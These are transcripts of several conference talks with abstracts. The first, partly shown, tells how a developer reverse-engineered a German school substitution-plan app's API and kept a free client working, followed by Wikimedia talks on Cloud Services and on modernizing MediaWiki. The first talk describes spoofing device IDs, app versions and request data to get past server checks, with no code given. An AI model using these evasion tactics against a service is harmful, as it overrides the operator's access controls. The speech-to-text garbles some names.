And here are three conditions. The first is decomplification of the license-taker or another one for the use of a file of the program or the name of a person who is powerful. It says, you must have permission to use the program. Yay, I think I'm allowed to use the program. I'm assuming I am. I go paid for it. Second, the necessary information for the manufacturing of interoperability are not yet made without further access for the number 1 person. The information you want to know is not already provided. Yeah, actually, Hineke Media didn't document this, obviously. So yeah, that's for fault. Third, the actions restrict themselves to the parts of the original programs that are necessary for manufacturing and interoperability. So you're only decompiling the part that contains the information you want to know. Yeah, I don't think this Android app is divided into parts. So let's just skip that. The law text goes on stating three things you may not do with the information you gain from decompiling. By handling the first step, you can't use the information that you want to know about other purposes than to manufacture interoperability, which will be used to create independent programs. So don't use it for other purposes than creating interoperability with the independently created program. Yeah, of course, I never use my knowledge for any other reasons. Never. And third, it's important that these for the interoperability of the independent production programs are necessary. So don't tell third parties about the information unless necessary for interoperability. Yes, my free software implementation couldn't be interoperable if the information wasn't public unless it was non-free software, which is not, obviously. For the development, production, or marketing of a program with a similar expression or for some other that are used for some other reasons, so don't violate the rest of the copyright law. Of course, we're not. Surely creating an alternative to something on its own doesn't violate copyright law, right? So yeah, after doing it, I discovered that I did so legally. So I found a usage of some class related to Gzip. So I tried around a bit and figured you could use this command to decrypt this string. And guess what it is? It's more JSON. What an efficient data format. We're hiding our encoded JSON inside more JSON. Let's look at the data we are sending. Of course, we have a user ID and a pass. Besides that, we have a lot of data, apparently, for statistics. You have the apps version. You have the package ID, the device model, the Android version, and API level, the user's language, and the current date. I don't know why you have the date. I think they know the date that the query arrives at. But yeah, you have that anyway. You have a, oh, sorry. Some of this is redundant from the request header or user agent that is already sent. I don't know why they do that twice. You have app ID, which is a unique per-installation ID, which I at first didn't know how to generate. And you have push ID, which is, I'm assuming, an ID generated by Google Mobile Services. No, no, no. It's Google Play Services to enable push notifications. So it becomes obvious that they're able to link requests together and possibly create usage patterns. What are they doing with this data? No clue. There's no privacy policy anywhere. Which of these fields are required? All of them, but push ID. But most strings can be left empty. So DSP Direct sent the minimal amount of requested data, which is everything, but with empty strings. And yeah, actually, guess what? This server allows insecure connections again. So something happened. On some date, the server side verification of this query was changed. And the field app version suddenly became mandatory. I ran some experiments and found examples of valid and invalid version names. These are examples of valid version names. These are examples of invalid version names. Finally, app versions that aren't real versions of Heineken Media's apps are accepted anyhow, like version 7.0.0. We're only at version 2.5.0. I don't remember 6.0, I think. So DSP Direct started sending along some app version, its own, actually, which was 2.5.0, and the same as an older DSP mobile release. And because I thought maybe they'd have more server side changes in the future, I implemented a new system. It was to prevent server side changes from requiring an update, because that would mean I have to write change logs, because Froot releases are slow, because the one who was uploading it to Google Play for me also always took a while. And because of that, there was now a look for a fix button that creates the news file, which is located at the repository's root, which allows me to inform users when they can expect a fix. It allows me to change this base JSON that credentials are appended to, which is this without the user ID and user password. So they're added to this JSON later. And in case they check that, I added an option to send the real date. I thought maybe that's what they would do next. They never did that, unfortunately. This was the same release as the one with the version number fix, this one. We have good news elsewhere, though. It was the same day, October 15, that I received an email that app.dsbcontrol.de was no longer accessible on port 80, and that Google phones were now being loaded locally. This email contained no usual, by rückfragen können Sie sich gerne direkt an mich wenden, unfortunately, maybe they didn't want to hear from me anymore. I couldn't verify this at first. October 16, I could verify this. So a friend noted that they have slow deploy times, apparently. Round three, it's October 17, and we're getting an invalid answer from the server again. Now the app ID has to be set to AUUID, and last ID has to be set to something. It can't be empty, so we're now sending zu frühstückseid. I wasn't aware of how to generate app IDs yet, so I just took the one that I had captured from my device, contributed to a pixilon, and me learned this through trial and error. However, it was very bothersome, because the server sometimes accepted and sometimes rejected the very same query. So this slow update cycle we'd noticed earlier turned out to be really bothersome and frustrating, because you'd try something, and then it would work, and then you'd remove it again, and it wouldn't work anymore, and then you thought this was the cause for it, and actually it was just a slow release deploy cycle. Likely, or maybe they had just banned this app ID at this point in time, but I didn't realize. I'm not sure. Rather, I believe the server was generally struggling and rejecting logins, because my DSP mobile installation with this app ID was also sometimes rejected. Round four, they seem to have reverted some of these changes later, which reaffirmed, I believe, that all DSP mobile installations were affected. Contributor pixilon figured that device was now mandatory, which meant not empty. So we sent device A. I remembered to have at some point in time sent the words cutoffel or toaster as a device, eventually. Now I thought we were smart. I added new functionality to this new system, I explained earlier. Firstly, as a precaution, I could remotely activate sending the last date, in case that, I mean, remotely means that it happens when users click on look for a fix. Secondly, I could now set an array of headers to send to the server. And thirdly, we had discovered some alternative end points. To understand this, you first have to know that they have sold skin versions of DSP. So this is the normal DSP mobile. I showed it earlier already. This is the IHACA skinned DSP mobile. It's accessible via two URLs. That delivers the same data as this website. It also has a corresponding skinned Android app. So I configured. So I could configure the endpoint the client would send the data to, because each of these had a different endpoint. And this app used one of these two. However, this was tricky, because I had to prevent myself from giving myself the power to redirect users' queries to my own server. So I hardcoded four URL endpoints, endpoint URLs, mobile web IHACA mobile and app IHACA bb, into the app so I could switch between them using an integer. And I set it to the IHACA mobile endpoint. I believe it was the very next day that IHACA mobile and app IHACA bb endpoints were broken. Actually, they returned invalid data in a way that crashed my app. Whoops. And suddenly, the web endpoint from the normal website was constantly moving to new locations. And there was a configuration.js script that contained where it was. So I hardcoded into the app as a precaution in case I needed later a very specific way to find this location. And it was behind this seventh quotation mark or something. Clearly unreliable. And suddenly, the string was moved a line downwards. So it was now the ninth quotation mark. Interesting. Also, this app stopped working. It's still on the Play Store now, and it's still not working. This website is still available, and it's not working, because they broke their endpoint. This was around the time that this Google Play takedown notice reached us, because apparently, DSP Direct infringes the trademark of DSP. I don't feel qualified to comment on this, as I don't understand trademark law. I tried to ask for a specific clarification as to why they removed my app three times, but they never responded. By the way, that's a nice trick you can do with emails you don't like. You can just pretend you never received them. So a few days later, the website JavaScript, including configuration.js, was obfuscated in such a way that I don't understand how it works. But it constantly evokes the debugger if the developer tools are open. You can, in theory, easily circumvent this by telling a browser to ignore breakpoints. This doesn't seem to work with Firefox, but it works in Chromium. I don't know why. I'm just going to assume we could have figured this out somehow. Be it that we could have had a web view running in the background if we absolutely had to, but fortunately, contributor Big Selen had come up with what is needed to talk to the mobile endpoint now, because more data through decompilation he learned that was being generated using a default Java UUID class, uid.randomUID.2 string. Also device ID was mandatory. So I added spoof data. I took a random device ID from this list. I took a random OS version from anything between 402 and 10.0. I took random language, mostly German, sometimes English. And as a bundle ID, I took the package ID of DSP mobile with an option to disable this via news in case it would get in the way somehow. And that was the end of that. Apparently, they stopped trying to prevent DSP mobile from working. Apparently, after it releases, don't count to them. And it isn't worth their time. Or maybe they're just uncreative. I could still think of a few ways to tell DSP Direct and DSP Mobile apart, but I'm clearly not going to tell them. However, just this month, Pixie-Lon asked again why DSP Mobile was removed from the Play Store. Also because he believed we didn't violate German trademark law, contributor Jasmich, who is sitting here, by the way, had uploaded DSP Direct to the Play Store again. And he received a rather interesting response. They get her Herzberger, Die Pixie-Lon. Thank you for your email. Unfortunately, we were able to have a qualified discourse to this topic with you. And we are neither data to you nor to Mr. Godaubekannt. This means, unfortunately, we don't have your address. And this can send you legally meaningful messages. It means you want to make a draft. And also, it's not clear which rights are related to each other. We don't know about your legal relationship. This is a bit strange, because I don't know either. According to my father, we might be a gesellschaft-bögelichen rechts, but it's not exactly proof of familiarity with free software. Nevertheless, I would like to express our position again in the following way. It has again started another third of our internal DSP Mobile API for our own software products. We will tell you about it in a brief and last time. You may not use our internal API. I find it questionable whether a publicly-facing API is to be considered internal. One might argue that it is only for communication between software they control. But I believe I control my device and my client installation, not them making the API not internal. An app with the same or similar name as DSP is also in the European space. Here is Market Schutz through Heineken Media. I don't understand trademark law. There are so many trademarks starting with this, or just consisting of the various DSP with partially overlapping registered use cases. And their trademark doesn't have distinctive character with the unterscheidungskraft. And I just don't understand it. By the way, there are other trademark digital schwarzes that registered as a different one from DSP was once rejected as a national trademark just because it didn't have distinctive character. Why can there be European trademark laws without European trademarks without distinctive character? I do not understand and I'm not qualified to comment. An app-breitstellung im Store ist dabei eine geschäftliche Tätigkeit, ganz egal welchem wirtschaftlichen Zweck diese folgt. Es besteht Verwechslungsgefahr. Wir untersagen ihn hier mit der benutzung der geschützten Marker DSP letztmalig. The first part is true. I got not wrong. It counts as geschäftlicher Verkehr when you provide a service even for free to the public. There's danger of confusion. This has to be about the letters DSP, right? Because as I explained earlier, our logo is completely unrelated. However, I'm not too certain that there really is danger of confusion that Heineken Media is directly affected by or exclusively affected by. After all, one could also believe that it is an app that provides access to something related to the Danish railway company. Of course it is not, but it's about recognition value, which is not something that DSP has exclusively for sure. Wir untersagen ihn hiermit die benutzung der geschützten Marker DSP letztmalig. Oh, yeah, I already read it out. Sollten Sie weiterhin gegen unsere deutlichen aufforderung verstoßen, werden wir den Fall an unsere rechtliche Vertretung Herrn Dr. Selig übergeben. Dieser ist in dieser E-mail bereits CC. Scaring us. Ebenfalls werden wir weiterhin gegen jede Veröffentlichung einer solchen App vorgehen. Entsprechend dadurch entstehende Kosten würden wir bei Ihnen als Schadensersatz geltend machen. Wir bitten um zwingende Beachtung. Mit freundlichen Grüßen, Andreas Norg. Norg? That's the CEO of Heineken Media. Yay, we're famous. We redirected this email to contributier Jasmich, who had DSP direct up on the playster at this point of time, and he decided to take it down and apologize. Suddenly, and this was the very next day, he received an email that's harrowing a lot friendlier. Hallo. Vielen Dank für Ihre Entgegenkommen. Wir finden Ihren Ansatz prinzipiell sehr gut. Allerdings hätten wir uns gewünscht, dass Sie uns vor Veröffentlichung und Nutzung unserer API um Erlaubnis gebeten hätten. If you had asked for permission, I'm quite sure we would not have received it. Dennoch möchten wir Ihr Engagement gerne würdigen und würden Sie daher gerne zu uns nach Hannover einladen. Vielleicht können Sie uns mit Ihren Ideen helfen, eine bessere App zu bauen. Vielleicht finden wir ja sogar einen Weg, dass Sie daran mitbauen. Gerne fördern wir junge Talente. Wir würden uns freuen, Sie kennenlernen zu dürfen. Ich freue mich auf Ihre Rückmeldung mit freundlichen Grüßen, Norg. I'd rather leave this largely uncommented. I don't know exactly what they want from us, but I guess we'll have to see. And that's the dramatic cliffhanger that we have to end our talk with for the events are yet to unroll. There's one thing that I can learn from this. Don't use other people's trademarks, because trademark laws too complicated. Apologizing instead of being rebellic seems to work better, even if the thought of conflict increases you and you really do believe you're in the right, you probably just misunderstood the law. Alternatively, exclusively, do such things anonymously. Decide beforehand what you want to put your name on. Thank you.
Many schools in Germany choose to distribute their substitute plans via a proprietary platform. The provided client software is not very pleasurable to use and inconveniences users with its dependency on Google Play Services. That's why I develop a free client for Android called DSBDirect, which is able to display plans in a nice, filtered way. Many schools in Germany choose to distribute their substitute plans via the proprietary [[DSB platform]](https://heinekingmedia.de/education/digitales-schwarzes-brett). The provided client software is not very pleasurable to use and inconveniences users with its dependency on Google Play Services. That's why I develop a free client for Android called DSBDirect, which is able to display plans in a nice, filtered way. Since they noticed my app, the company operating DSB has been obfuscating their various endpoints more and more in an attempt to prevent my app from working, while on the other hand not being very competent at security. It's a cat-and-mouse game.
10.5446/53234 (DOI)
Hello hello everybody we're ready to get started we have Lucas and Amir here and they want to give us a quick introduction of a project from the Wikimedia foundation called Cloud Services and how it might be maybe useful to all of us so let's give round of welcoming applause to Lucas and Amir Thanks. Hello so Wikimedia Cloud Services is basically this big collection of all kinds of different things which are useful if you want to do technical things in the Wikimedia universe like with Wikipedia or other projects and you get them free of charge or you can just use them and the only requirement is that you use them for something that's kind of relevant to the mission of Wikimedia of promoting free knowledge and that kind of stuff and it's kind of split into the things that you can do with your regular Wikimedia account which any registered user can do and then there's also things you need a special account for on a different system called Wikitech and Amir is going to talk more about those later But first let's just look into some of the things you can do with your regular Wikimedia account and if you want to follow any of these links there's a shortcut here I was about to switch to the next step so let's just stay here for a few seconds So the first thing is the API sandbox which is if you want to use the media wiki API to figure out what you have on a page or to make edits or any kind of stuff the API sandbox is a special page that's really useful to find out how to use the API For example here's all the different actions I can use that say query is the kind of general catch all action that's here and then I get down here a list of all the parameters I can use with query such as I want to have all the user info and what kind of user info do I want options blah blah blah I would like to have some different forward version so it gives you all these nice inputs for figuring out exactly how to use the API what's valid what's not valid and then you can make the API request and there you get a response and we can't read anything because it's zoomed in way too much but it's very helpful when trying to use the API and then in the end here you can see what you need to do in your own code to make the same API request and for anything that you can do with a normal API so if you want to do some kind of more expensive analysis you can often do that with query which is a tool that lets you write SQL queries against databases that are almost like the ones in production like you don't have user passwords and stuff and you have all the database tables with the page metadata and connections between them and the logs and all kinds of stuff and you can just write your SQL here send it and you get the results for example here's the number of lexines published per day so it's some kind of selecting from the page where the name space is the lexine name space and grouping that by the date and then we get something like all the way down to September which is apparently when I ran this query that were here there were 116 lexines created in this day or here someone had a list of edits to JavaScript and CSS pages on Hungarian Wikipedia so you can run these queries against any week you like like this Hungarian Wikipedia one and if you can't get by with just SQL what you also have is this thing called pause which gives you a doopiter instance if you've heard of that you can basically write your own Python code here and do it in a very convenient way because there's all kinds of auto-completion and helpful things so I can just try to copy this and run the code damn I needed a new cell below it there we go thanks and if I type item I should get helpful hints what I can do with the item if it's not hanging or something or the tab control space oh there we go yeah and that's also a very useful way to work with pybiky bots or you can also directly get normal shell here and one thing oops did I click the wrong thing I would like to have oh no I don't want a bash notebook I want a new terminal that's what I want and here you have for example database dumps in where was it public dumps something public again so if you want to do some kind of analysis here on the data dumps you can get them here and then have all the computing time you want I guess to analyze the wiki more thoroughly and all this is hosted in the wikimedia cloud for you and you don't need your own server or anything oh yeah I had two more examples of that for example here I used that to so there were a lot of items on wikipedia where there was some encoding error this should be an apostrophe like down here and instead it was this kind of I with an accent and I hacked together some ugly java python code to make all of these edits and it was already logged in as well I didn't need to worry about logging in or having a password or anything so it's a very convenient way to make edits as well or you can build something nicer here you can insert like markdown cells to explain what you're doing and how the code works and build nice notebooks like that which are almost self-explanatory and those are some of the things you can do just with your wikimedia account and now Amir is going to talk about some other things thanks Lukas so the thing that we can do is that maybe some of you like me think that doing thing in browser is for kids I need to do things in terminal and connect to the system and then you can access for a wikitec account which you can just make a wikitec account in this place called wikitec no no but I do the main thing the main list oh yeah okay so in here so and then you make a wikitec account and it gets approved quickly and then you get the shell and then you can just quickly go there and you can go to this shell and just login and then you have access to the big set of nodes in the cloud and you can just do whatever you want also you have access to the core domes and you have access to the replica database let me show it to you this one? Alt-Tab yeah okay so for example you can go to LS, German layout, domes and then you can go to, is it like this? okay public and then slash domes and slash public and then slash wikidata wiki and then you get oh there's like all sorts of time and everything that you want to but if you also you can do something else is that you can just do squl wikidata wiki and then okay and then you're inside the wikidata database I mean it does you don't have the rights you cannot write to the replica because it's a replica and also it's sanitized so it doesn't have the like hash of user password and stuff like that but still you can do just select, where is it from? recent changes, limit 5 and it's probably not sorted by anything convenient yeah and then you get all of the things that you want to you cannot even describe anything you want to directly into the system and then there is also we have something called the job grid so you can just put the cron and anything that you want to or just run something directly and you go through a big note of cloud Kubernetes and then just runs everything that you want to in is here there's the more information about it in here there's like a long help that he says like oh use run this job and then job of what it does and you can get this so you just need to it's a bash command you can run any bash command and send it okay return me this output to the this place and the other places one thing that you can do is also there's a web server you can access everything directly so you can just put a PHP file there and into the opportunity and then yeah for example this is an example that we built together I think two Christmas ago but this was like you can just see this is a PHP file the source code is available and you just copy paste that source code into like a directory and it was there and you every time we click on it and you get most of the edits that happen on description in the data that might be vandalism and we can fix it also this is not just the only thing that you can do with this is that you can also put a Python flask application is this the Python flask and then this can be just a Python application and you can just have the file there and also Node.js and Java there's so many of them also you can have own database like you have something that has its own database for example quick categories in here has jobs that are here this is this tool for its own built-in database inside our cloud services and it's just fine you can do that as well and also there's a cloud VPS that doesn't do any Kubernetes it just you can make a VPS of your own and then do whatever you want with it so for example and you get a project and you get a quota it's slightly more limited but also you have access to the whole VPS you have pseudo rights on it you can do whatever you feel like about it so we have like for example this project in here and it's called tools and then there's proxies and you can for example go into that instance and reboot it and do whatever you want and you can make new instance and look at your quota and look at everything else there and also you can also make even a Vkey on one of those cloud VPS systems which is for example we did in here if you look at it it's just a Vkey and the difference is that for other ones for example for the vandals and dashboards you have tools.wmlflabs.org and then a slash WDWVD which is the tool itself but in here we get our own subdomain so we show vkey data dash like sim dash lua the wmlflabs.org and you can even put all sorts of subdomains for the wmlflabs.org as long as it's not taken so you can build a media vkey instance like this or you can just complete a new software anything you can put a wordpresser who cares and then you can use it it's very simple you have your own thing and you can help lots of expedients anything else I don't think so most important I would say is tool forage to run your website or if that's not enough for you cloud VPS and then you get your own VM where you can do absolutely anything you want as long as it matches those rules and stuff and I think that's it are there any questions hello thank you very much for the talk that was very quick so maybe anybody has a question here I'll give you my microphone to ask it I don't see any hands no okay I don't think we have questions but if you're just too shy to ask I think these guys always hanging around here around the wikipack a wiki so if you have anything you want to talk about you'll find them later okay then give a round of applause again for Lucas and Amir you
Find out what kind of free services Wikimedia provides for you. Wikimedia Cloud Services is a collection of services that the Wikimedia Foundation offers, free of charge, to anyone who can use them for furthering the goals of the Wikimedia movement. This includes Toolforge, a hosting service for tools written in various languages; Cloud VPS, full virtual private servers for advanced development beyond the capabilities of Toolforge; convenient access to Wikimedia project data; and more!
10.5446/53239 (DOI)
Good morning. I'm glad you all made it here this early on the last day. I know it can be easy. It wasn't easy for me. I have to warn you that the way I prepared for this talk is a bit experimental. I didn't make a slide set. I just made a mind map and I'll just click through it while I talk to you. So this talk is about modernizing Wikipedia. As you probably have noticed, visiting Wikipedia can feel a bit like visiting a website from 10, 15 years ago. But before I talk about any problems or things to improve, I first want to revisit that the software and the infrastructure we build around it has been running Wikipedia and its sister sites for the last, well, nearly 19 years now. And it's extremely successful. We serve 17 billion page views a month. Yes? You make it louder? Is this better? If I speak up, I will lose my voice in 10 minutes. It's already a bit, no, it's fine. We have technology for this. The light doesn't help. The contrast could be better. Is it better like this? Okay, cool. All right. So, yeah, we are serving 17 billion page views a month, which is quite a lot. Wikipedia exists in about 100 languages. If you attended the talk about the Wikipedia infrastructure yesterday, we talked about 300 languages. We actually supported 300 languages for localization. But we have Wikipedia in about 100 if I'm not completely off. I find this picture quite fascinating. This is a visualization of all the places in the world that are described on Wikipedia and sister projects. And I find this quite impressive. Though it also is a nice display of cultural bias, of course. We, that is, the Wikimedia Foundation run about 900 to 1,000 wikis, depending on how you count. But there are many, many more media wiki installations out there. Some of them big, some of them, and many, many of them small. We have, actually, we have no idea how many small instances there are. So it's a very powerful, very flexible, versatile piece of software. But, you know, sometimes it can feel like you can do a lot of things with it, right? But sometimes it feels like it's a bit overburdened. And maybe you should look at improving the foundations. So one of the things about that make media wiki great, but also sometimes hard to use is that kind of everything is text. Everything is markup. Everything is done with Wikichext, which has grown in complexity over the years. So if you look at the autonomy of a wiki page, it can be a bit daunting. You have different syntax for markup, different kinds of transclusion or templates in media, and some things actually, you know, get displayed in place, some things show up in a completely different place on the page. It can be rather confusing and daunting for newcomers. And also things like having a conversation, just talking to people, like, you know, having a conversation thread looks like this. You open the page, you look through the markup, and you indent to make a conversation thread. And then you get confused about the indenting, and someone messes with the formatting, and it's all excellent. There have been many attempts over the years to improve the situation. We have things like Echo, which notifies you, for instance, when someone mentions your name, or someone... It is also used to welcome people and do this kind of achievement unlock notifications. Hey, you did your first edit. This is great. Welcome, right? To make people a bit more engaged with the system. But it's really mostly improvements around the fringes. We have had a system called Flow for a while to improve the way conversations work. So you have more like a thread structure that the software actually knows about. But then there are many... Well, quite a few people who have been around for a while are very used to the manual system. And also there are a lot of tools to support this manual system, which of course are incompatible with making things more modern. So we use this, for instance, on mediawiki.org, which is a site, basically a self-documentation site of MediaWiki. But on most Wikipedia's, this is not enabled, or at least not used per default everywhere. The biggest attempt to move away from the text-only approach is Wikidata, which we started in 2012. The idea of Wikidata, of course, if you didn't attend many great talks, we had about it here over the course of the Congress, is a way to model the world using structured data, using a semantic approach instead of a natural language, which has its own complexities, but at least it's a way to represent the knowledge of the world in a way that machines can understand. So this would be an alternative to Wikitext, but still the vast majority of things, especially on Wikipedia, are just markup. And this markup is pretty powerful, and there's lots of ways to extend it and to do things with it. So a lot of things on MediaWiki are just DIY, just do it yourself. Templates are a great example of this. Infoboxes, of course, the nice blue boxes you have on the right side of pages are done using templates, but these templates are just for formatting, right? They're not data processing. There's no database or structured data backing them. It's just basically, you know, it's still just markup. You have a predefined layout, but you're still feeding a text, not data. You have parameters, but the values of the parameters are still, again, maybe templates or links, or you have markup in them like HTML line breaks and stuff. So it's kind of semi-structured. And this, of course, is also used to do things like workflows. So the template I just showed, no, this was actually an Infobox, wrong picture, wrong caption. It's also used to do workflows. So if a page on Wikipedia gets nominated for deletion, you put a template on the page that defines why this is supposed to be deleted, and then you have to go to a different page and put a different template there, giving more explanation, and this, again, is used for discussion. It is a lot of, you know, structure created by the community and maintained by the community using conventions and tools built on top of essentially what is essentially just a pile of markup. And because doing all this manually is kind of painful, early on, we created a system to allow people to add JavaScript to the site, which is then maintained on Wikipedia by the community. And it can tweak and automate. But again, this, it doesn't really have much to work with, right? It basically messes with whatever it can. It directly interacts with the DOM of the page. Whenever the layout of the software changes, things break. So this is not great for compatibility, but it's used a lot. And it is very important for the community to have this power. Sorry. I wish there was a better way to show these pictures. Okay. Yeah, that's just to give you an idea of what kind of thing is implemented that way and maintained by the community on their site. One of the problems we have with that is these are bound to a wiki, and I just told you that we run over 9,000, no, 900 of these, not over 9,000. And it would be great if you could share them between wikis, but we can't. And again, there have been, we have been talking about it a lot, and it seems like it shouldn't be so hard, but you kind of need to write these tools differently if you want to share them across sites because different sites use different conventions, they use different templates, then it just doesn't work. And you actually have to write these in software that uses internationalization if you want to use it across wikis. While these are usually just one off hacks with everything hard coded, we would have to put in place an internationalization system, and it's actually a lot of effort, and there's a lot of things that are actually unclear about it. So before I dive more deeply into the different things that, well, make it hard to improve on the current situation and the things that we are doing to improve it, do we have any questions or do you have any other, do you have any things you may find particularly, well, annoying or particularly outdated when interacting with Wikipedia? Any thoughts on that beyond what I just said? The strict separation just in Wikipedia between mobile layout and desktop layout. So actually having a reactive layout system that would just work for mobile and desktop in the same way, and allowing the designers and UX experts who work on the system to just do this once, and not two or maybe even three times, because we also have native applications for different platforms, would be great, and it's something that we are looking into at the moment. But it's not that easy. We could build a completely new system that does this, but then again you would be telling people you can no longer use the old system, but no, they have built all these tools that rely on how the old system works, and you have to port all of this over, so there's a lot of inertia. Any other thoughts? Everyone is still asleep. That's excellent, so I can continue. So another thing that makes it difficult to change how many Wiki works or to improve it, is that we are trying to do at least two things at once. On the one hand, we are running a top five website and serving over 100,000 requests per second using the system, and on the other hand, at least until now, we have always made sure that you can just download MediaWiki and install it on a shared hosting platform. You don't even need root on the system, right? You don't even need administrative privileges. You can just set it up and run it in your web space, and it will work. And having the same piece of software do both, run in a minimal environment, and run at scale is rather difficult, and it also means that there's a lot of things that we can't easily do. All this modern microservice architecture, separate front-end and back-end systems, all of that means that it's a lot more complicated to set up and needs more knowledge or more infrastructure to set up. And so far, that meant we can't do it because so far there was this requirement that you should really be able to just run it on your shared hosting. And we are currently considering to what extent we can continue this. And container-based hosting is picking up. Maybe this is an alternative. It's still unclear, but it seems like this is something that we need to reconsider. Yeah, but if we make this harder to do, then a lot of current uses of MediaWiki would maybe no longer exist, or at least would not exist as they do now, right? You probably have seen this nice MediaWiki instance, the Congress Wiki, which are completely with a completely customized skin, and a lot of extensions installed to allow people to define their sessions there, and making sure these sessions automatically get listed and get put into a calendar. And this is all done using extensions like Semantic MediaWiki that allow you to basically define queries in the WikiText markup. Another thing that of course slows down development is that Wikimedia does engineering on a comparatively a shoestring budget, right? The budget of the Wikimedia Foundation, the annual budget, is something like $100 million. That sounds like a lot of money. But compared to other companies running a top five or top ten website, it's like 2% of their budget or something like that, right? It's really, I mean, $100 million is not peanuts, but compared to what other companies invest to achieve this kind of goal it kind of is. So what this budget translates into is something like 300, depending on how you count, between 300 and 400 staff. So this is the people who run all of this, including all the community outreach, all the social aspects, all the administrative aspects. Less than half of these are the engineers who do all this. We have something like 1,500 servers, bare metal, which is not a lot for this kind of thing. Which also means that we have to design the software to be not just scalable, but also quite efficient. The modern approach to scaling is usually scale horizontally, make it so you can just spin up another virtual machine in some cloud service. But yeah, we run our own servers, so we can design to scale horizontally, but it means ordering hardware and setting it up, and it's going to take half a year or so. And we don't actually have that many people who do this. So scalability and performance are also important factors when designing the software. Okay, before I dive into what we are actually doing, any questions? This one in the back. Wait for the mic, please. Hi. So you said you don't have that many people, but how many do you actually have? It's something like 150 engineers worldwide. It always depends on what you count. Do you count the people who work on the native apps? Do you count engineers who work on the Wikimedia cloud services? Actually, we do have cloud service. We offer them to the community to run their own things, but we don't run our stuff on other people's cloud. So depending on how you count or something, and whether you count the people working here in Germany for Wikimedia Germany, which is a separate organization technically, something like 150 engineers. Thanks. I'm interested. What are the reasons that you don't run on other people's services like on the cloud? It will be easy to scale for something, right? Well, one reason is being independent. Imagine we ran all our stuff on Amazon's infrastructure, and then maybe Amazon doesn't like the way that the Wikimedia article about Amazon is written. What do we do? Maybe they shut us down. Maybe they make things very expensive. Maybe they make things very painful for us. Maybe there is a, at least like a self-censorship mechanism happening. And we want to avoid that. There are thoughts about this. There are thoughts like maybe we can do this at least for development infrastructure and CI, not for production. Maybe we can make it so that we run stuff in the cloud services by more than one vendor. So we basically, we spread out so we are not reliant on a single company. We are thinking about these things, but so far the way to actually stay independent has been to run our own service. You've been talking about scalability and changing the architecture. That kind of seems to imply to me that there is a problem with scaling at the moment, or that it's foreseeable that things are not going to work out if you just keep doing what you're doing at the moment. Can you maybe elaborate on that? I think there are two sides to this. On the one hand, the reason I mentioned it is just that a lot of things that are really easy to do, basically for me, right, works on my machine, are really hard to do if you want to do them at scale. One aspect, the other aspect is media Wiki is pretty much a PHP monolith. That means scaling always means copying the monolith and breaking it down so you have smaller units that you can scale and just say, yeah, I don't know, I need more instances for authentication handling or something like that. That would be more efficient, right, because you have higher granularity. You can just scale the things that you actually need, but that of course needs re-architecting. It's not like things are going to explode if we don't do that very soon. So there's not like an urgent problem there. The reason for us to re-architect is more to gain more flexibility and development, because if you have a monolith that is pretty entangled, code changes are risky and take a long time. How many people work on product design or user experience research to sit down with users and try to understand what their needs are and from their procedure? I don't have an exact number. Something like five. Do you think that's sufficient? The question was if it's sufficient. Probably not, but it's more people than we have for database administration and that's also not sufficient. Are there further questions? Okay. One of the things that holds us back a bit is that there's literally thousands of extensions for MediaWiki and the extension mechanism is heavily reliant on hooks, so basically on callbacks. I don't have a picture. I have a link here. We have a great number of these. So you see each paragraph is basically documenting one callback that you can use to modify the behavior of the software. I never counted, but something like a thousand. All of them are of course interfaces to software that is maintained externally, so they have to be kept stable. If you have a large chunk of software that you want to restructure, but you have a thousand fixed points that you can change, things become rather difficult. These hook points kind of like nails in the architecture, and then you kind of have to wiggle around them. It's fun. We are working to change that. We want to architect it, so the interface that is exposed to these hooks become much more narrow, and the things that these hooks or these callbacks functions can do is much more restricted. There is currently an RSC open for this. It has been open for a while, actually. The problem is that in order to assess whether the proposal is actually viable, you have to survey all the current uses of these hooks and make sure that the use case is still covered in the new system. We have a thousand hook points and a thousand extensions. That's quite a bit of work. Another thing that I'm currently working on is establishing a stable interface policy. This may sound pretty obvious. It has a lot of pretty obvious things. If you have a class and there's a public method, then that's a stable interface. It will not just change without notice. We have a deprecation policy and all that. If you have worked with extensible systems that rely on the mechanisms of object-oriented programming, you may have come across the question whether a protected method is part of the stable interface of the software or not, or maybe the constructor. If you have worked in environments that use dependency injection, the idea is basically that the constructor signature should be able to change at any time, but then you have extensions that you subclassing and things break. This is why we are trying to establish a much more restrictive stable interface policy that would make explicit things like constructor signatures actually not being stable. That gives us a lot more wiggle room to restructure the software. MediaWiki itself has grown as a software for the last 18 years or so, and at least in the beginning was mostly created by volunteers. You can use the dependency to find and grab the thing that you want to use and just use it, which leads to structures like this one. Everything depends on everything. If you change one bit of code, everything else may or may not break. If you don't have great test coverage at the same time, this just makes it so that any change becomes very risky and you have to do a lot of manual testing and a lot of manual digging around, touching a lot of files. For the last year, year and a half, we have started a concerted effort to cut the worst ties to decouple these things that have most impact. There are a few objects in the software that represent, for instance, one that represents a user and one that represents a title that are used everywhere and the way they're implemented currently also means that they depend on everything, and that, of course, is not a good situation. A similar idea on a higher level is decomposition of the software. The decoupling was about software architecture. This is about system architecture. Breaking up the monolith itself into multiple services that serve different purposes. The specifics of this diagram are not really that relevant to this talk. It's more to give you an impression of the complexity and the sort of work we are doing there. The idea is that perhaps we could split out certain functionality into its own service into a separate application, like maybe move all the search functionality into something separate and self-contained. The question is, how do you, again, compose this into the final user interface? At some point, these things have to get composed together again. Again, this is a very trivial issue if you only want this to work on your machine or you only need to serve 100 users or something. But doing this at scale, doing it at the rate of something like 10,000 page views a second, I said 100,000 requests earlier, but that includes resources, ICANN, CSS, and all that. Then you have to think pretty hard about what you can cache and how you can recombine things without having to recompute everything. This is something that we are currently looking into, coming up with an architecture that allows us to compose and recombine the output of different backup services. Before I started this talk, I said I would probably roughly use half of my time going through the presentation. I guess I just hit that spot on. This is all I have prepared, but I'm happy to talk to you more about the things I said or maybe any other aspects of this that you may be interested in. If any comments or questions? Oh, three already. First of all, thanks a lot for the presentation. Such a really interesting case of a legacy system. Thanks for honesty. It was really interesting as a software engineer to see how that works. I have a question about decoupling. You have probably a system that is enormous. How do you find the most evil parts which are sort of high-stability coupled? Do you use other software with this matrix? Do you just know? This is quite interesting and maybe we can talk about it a bit more in depth later. Very quickly, it's a combination. On the one hand, you just have the anecdotal experience of what is actually annoying when you work with the software and you try to fix it. On the other hand, I try to find good tooling for this. The existing tooling tends to die when you just run it against our codebase. One of the things that you are looking for is cyclic dependencies. The number of possible cycles in a graph grows exponentially with a number of nodes. If you have a pretty tightly knit graph, that number quickly goes into the millions. The tool just goes to 100% CPU and never returns. I spent quite a bit of time trying to find heuristics to get around that. We can talk about that later if you like. Next. What exactly is this wiki data you mentioned 